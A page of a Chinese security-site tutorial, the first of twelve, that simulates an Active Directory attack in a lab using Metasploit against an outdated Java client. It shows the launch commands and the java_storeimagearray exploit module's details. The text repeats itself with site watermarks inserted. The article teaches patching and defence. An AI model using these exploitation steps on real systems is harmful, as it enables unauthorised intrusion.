欢迎来到 无奈人生 安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

域渗透的攻击模拟测试:从无访问权限到域管理员权限

来源: 作者: 时间:2019-02-24 21:26 点击: 我要投稿
广告位API接口通信错误,查看德得广告获取帮助

本文的主要目的是为了说明使用最新的安全补丁保持系统最新的重要性; 尤其要说明的是,这篇文章将讨论关于企业Windows环境中的安全性。
活动目录
通常,在Windows系统数量较为离散的公司中,一般会使用名为Active Directory的系统来设置域。基本上,它实现了许多进程和服务,这些进程和服务简化了域网络内的Windows用户帐户的管理,可以集中处理这些事务。
 

运行Active Directory域服务的服务器的名称叫作域控制器(DC):通过配置域控,可以定义应用于属于该域的用户和计算机的规则和策略。具有域管理员权限的帐户属于Domain Admin组:它对注册到域的所有计算机具有管理员权限,即使在DC上也是如此。一旦你拥有了该域的管理员权限,你基本上可以做你想做的一切; 这就是为什么只设置一组受限制的授权帐户(真正需要特权的账户)拥有这些权限的方式来保护域是非常重要的。
关于域控制器安全性的另一个重要方面是,虽然本地用户的密码存储在已定义的计算机内,但域用户的密码存储在DC中。
虚拟实验室
为了模拟对域的攻击,我们可以设置Active Directory虚拟实验室环境,其中Windows Server 2012 R2充当域控制器,Windows 7 SP1 64位是一台会模拟注册到域的办公网工作站主机。在Windows 7计算机上安装了老版本的Java Runtime Environment Java 6 Update 23,它受到一系列远程执行代码(RCE)漏洞的影响。此外,操作系统没有打MS15-051漏洞的安全补丁,这个漏洞可以用于本地特权升级。
攻击者将默认使用Kali Linux发行版中有名的Metasploit Framework作为攻击工具。在进行了初始的信息收集之后,攻击者在客户端主机上发现安装了Java 6u23,之后开始发起攻击。
我们可以从启动PostgreSQL服务作为开始,以便使用Metasploit数据库:
root@kali:~# service postgresql start
然后我们可以启动Metasploit控制台:
root@kali:~# msfconsole -q
msf >
Java客户端漏洞利用
在影响Java 6u23的所有漏洞中,我们可以使用Java的 storeImageArray()无效的数组索引漏洞。通过info命令,我们可以查看大量有关于这个漏洞的有用信息的描述,例如受影响的平台列表,可靠性排名,漏洞披露日期,模块作者,常见漏洞和暴露(CVE)标识符,当然还有我们需要设置运行漏洞利用的选项:
msf > use exploit/multi/browser/java_storeimagearray
msf exploit(java_storeimagearray) > info
       Name: Java storeImageArray() Invalid Array Indexing Vulnerability
     Module: exploit/multi/browser/java_storeimagearray
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2013-08-12
Provided by:
  Unknown
  sinn3r
  juan vazquez
Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows Universal
  2   Linux x86
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
Payload information:
  Space: 20480
  Avoid: 0 characters
Description:
  This module abuses an Invalid Array Indexing Vulnerability on the
  static function storeImageArray() function in order to cause a
  memory corruption and escape the Java Sandbox. The vulnerability
  affects Java version 7u21 and earlier. The module, which doesn't
  bypass click2play, has been tested successfully on Java 7u21 on
  Windows and Linux systems.
References:
  http://cvedetails.com/cve/2013-2465/
  http://www.osvdb.org/96269
  https://www.exploit-db.com/exploits/27526
  https://packetstormsecurity.com/files/122777
  http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]  下一页

本文的主要目的是为了说明使用最新的安全补丁保持系统最新的重要性; 尤其要说明的是,这篇文章将讨论关于企业Windows环境中的安全性。
活动目录
通常,在Windows系统数量较为离散的公司中,一般会使用名为Active Directory的系统来设置域。基本上,它实现了许多进程和服务,这些进程和服务简化了域网络内的Windows用户帐户的管理,可以集中处理这些事务。
 

运行Active Directory域服务的服务器的名称叫作域控制器(DC):通过配置域控,可以定义应用于属于该域的用户和计算机的规则和策略。具有域管理员权限的帐户属于Domain Admin组:它对注册到域的所有计算机具有管理员权限,即使在DC上也是如此。一旦你拥有了该域的管理员权限,你基本上可以做你想做的一切; 这就是为什么只设置一组受限制的授权帐户(真正需要特权的账户)拥有这些权限的方式来保护域是非常重要的。
关于域控制器安全性的另一个重要方面是,虽然本地用户的密码存储在已定义的计算机内,但域用户的密码存储在DC中。 www.wnhack.com
虚拟实验室
为了模拟对域的攻击,我们可以设置Active Directory虚拟实验室环境,其中Windows Server 2012 R2充当域控制器,Windows 7 SP1 64位是一台会模拟注册到域的办公网工作站主机。在Windows 7计算机上安装了老版本的Java Runtime Environment Java 6 Update 23,它受到一系列远程执行代码(RCE)漏洞的影响。此外,操作系统没有打MS15-051漏洞的安全补丁,这个漏洞可以用于本地特权升级。
攻击者将默认使用Kali Linux发行版中有名的Metasploit Framework作为攻击工具。在进行了初始的信息收集之后,攻击者在客户端主机上发现安装了Java 6u23,之后开始发起攻击。
我们可以从启动PostgreSQL服务作为开始,以便使用Metasploit数据库:
root@kali:~# service postgresql start
然后我们可以启动Metasploit控制台:
root@kali:~# msfconsole -q
msf >
Java客户端漏洞利用
在影响Java 6u23的所有漏洞中,我们可以使用Java的 storeImageArray()无效的数组索引漏洞。通过info命令,我们可以查看大量有关于这个漏洞的有用信息的描述,例如受影响的平台列表,可靠性排名,漏洞披露日期,模块作者,常见漏洞和暴露(CVE)标识符,当然还有我们需要设置运行漏洞利用的选项:

本文来自无奈人生安全网

msf > use exploit/multi/browser/java_storeimagearray
msf exploit(java_storeimagearray) > info
       Name: Java storeImageArray() Invalid Array Indexing Vulnerability
     Module: exploit/multi/browser/java_storeimagearray
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2013-08-12
Provided by:
  Unknown
  sinn3r
  juan vazquez
Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows Universal
  2   Linux x86
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

无奈人生安全网


  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
Payload information:
  Space: 20480
  Avoid: 0 characters
Description:
  This module abuses an Invalid Array Indexing Vulnerability on the
  static function storeImageArray() function in order to cause a
内容来自无奈安全网

  memory corruption and escape the Java Sandbox. The vulnerability
  affects Java version 7u21 and earlier. The module, which doesn't
  bypass click2play, has been tested successfully on Java 7u21 on
  Windows and Linux systems.
References:
  http://cvedetails.com/cve/2013-2465/
  http://www.osvdb.org/96269
  https://www.exploit-db.com/exploits/27526
  https://packetstormsecurity.com/files/122777
  http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040
内容来自无奈安全网

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]  下一页

copyright 无奈人生

。 (责任编辑:admin)
【声明】:无奈人生安全网(http://www.wnhack.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱472701013@qq.com,我们会在最短的时间内进行处理。